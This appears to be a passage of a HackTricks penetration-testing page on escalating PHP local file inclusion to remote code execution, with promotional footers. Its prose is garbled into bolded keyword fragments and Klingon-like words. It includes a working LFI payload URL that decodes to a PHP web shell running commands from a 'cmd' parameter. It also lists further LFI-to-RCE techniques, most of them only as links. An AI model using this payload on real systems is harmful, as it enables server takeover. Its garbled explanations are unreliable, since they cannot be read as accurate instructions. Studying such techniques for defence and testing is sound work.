[**This**](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64) **article** **tlhInganpu'** **PHP** **base64 filter** **Non-base64** **ignore**. **bypass** **file extension check** **use** **base64** **end** **".php"**, **"."** **ignore** **'ej** **append** **"php"** **base64**. **Example** **payload**:
```url
http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.php

NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
```
### php filters (ghItlh php filters)

[**writeup** ](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d) **ghItlh** **php filters** **arbitrary content** **generate** **output**. **php code** **arbitrary php code** **generate** **include** **write** **file** **ghItlh**.

{% content-ref url="lfi2rce-via-php-filters.md" %}
[lfi2rce-via-php-filters.md](lfi2rce-via-php-filters.md)
{% endcontent-ref %}

### segmentation fault (segmentation fault)

**Upload** **file** **temporary** `/tmp`, **request,** **segmentation fault**, **temporary file** **delete** **search**.

{% content-ref url="lfi2rce-via-segmentation-fault.md" %}
[lfi2rce-via-segmentation-fault.md](lfi2rce-via-segmentation-fault.md)
{% endcontent-ref %}

### Nginx temp file storage (Nginx temp file storage)

**Local File Inclusion** **Nginx** **running** **PHP** **RCE** **technique**:

{% content-ref url="lfi2rce-via-nginx-temp-files.md" %}
[lfi2rce-via-nginx-temp-files.md](lfi2rce-via-nginx-temp-files.md)
{% endcontent-ref %}

### PHP\_SESSION\_UPLOAD\_PROGRESS (PHP\_SESSION\_UPLOAD\_PROGRESS)

**Local File Inclusion** **session** `session.auto_start` `Off`. **`PHP_SESSION_UPLOAD_PROGRESS`** **multipart POST** **data**, PHP **enable session**. **RCE** **abuse**:

{% content-ref url="via-php_session_upload_progress.md" %}
[via-php\_session\_upload\_progress.md](via-php\_session\_upload\_progress.md)
{% endcontent-ref %}

### temp file uploads in Windows (temp file uploads in Windows)

**Local File Inclusion** **Windows** **RCE**:

{% content-ref url="lfi2rce-via-temp-file-uploads.md" %}
[lfi2rce-via-temp-file-uploads.md](lfi2rce-via-temp-file-uploads.md)
{% endcontent-ref %}

### phpinfo() (file\_uploads = on) (phpinfo() (file\_uploads = on))

**Local File Inclusion** **phpinfo()** **file\_uploads = on** **RCE**:

{% content-ref url="lfi2rce-via-phpinfo.md" %}
[lfi2rce-via-phpinfo.md](lfi2rce-via-phpinfo.md)
{% endcontent-ref %}

### compress.zlib + `PHP_STREAM_PREFER_STUDIO` + Path Disclosure (compress.zlib + `PHP_STREAM_PREFER_STUDIO` + Path Disclosure)

**Local File Inclusion** **exfiltrate path** **temp file** **server** **check** **file included PHP marks**, **bypass check** **Race Condition**:

{% content-ref url="lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md" %}
[lfi2rce-via-compress.zlib-+-php\_stream\_prefer\_studio-+-path-disclosure.md](lfi2rce-via-compress.zlib-+-php\_stream\_prefer\_studio-+-path-disclosure.md)
{% endcontent-ref %}

### eternal waiting + bruteforce (eternal waiting + bruteforce)

**LFI** **upload temporary files** **server** **hang** **PHP execution**, **brute force filenames** **hours** **temporary file**:

{% content-ref url="lfi2rce-via-eternal-waiting.md" %}
[lfi2rce-via-eternal-waiting.md](lfi2rce-via-eternal-waiting.md)
{% endcontent-ref %}

### Fatal Error (Fatal Error)

**Include** `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/phar.phar7`, `/usr/bin/phar.phar`. (**Include** **time** **throw error**).

**I don't know how is this useful but it might be.**\
_Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._

<figure><img src="../../.gitbook/assets/image (1) (5).png" alt=""><figcaption></figcaption></figure>

## References

* [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal)\
* [PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders)

{% file src="../../.gitbook/assets/EN-Local-File-Inclusion-1.pdf" %}

<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>

Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!

**Hacking Insights**\
Engage with content that delves into the thrill and challenges of hacking

**Real-Time Hack News**\
Keep up-to-date with fast-paced hacking world through real-time news and insights

**Latest Announcements**\
Stay informed with the newest bug bounties launching and crucial platform updates

**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>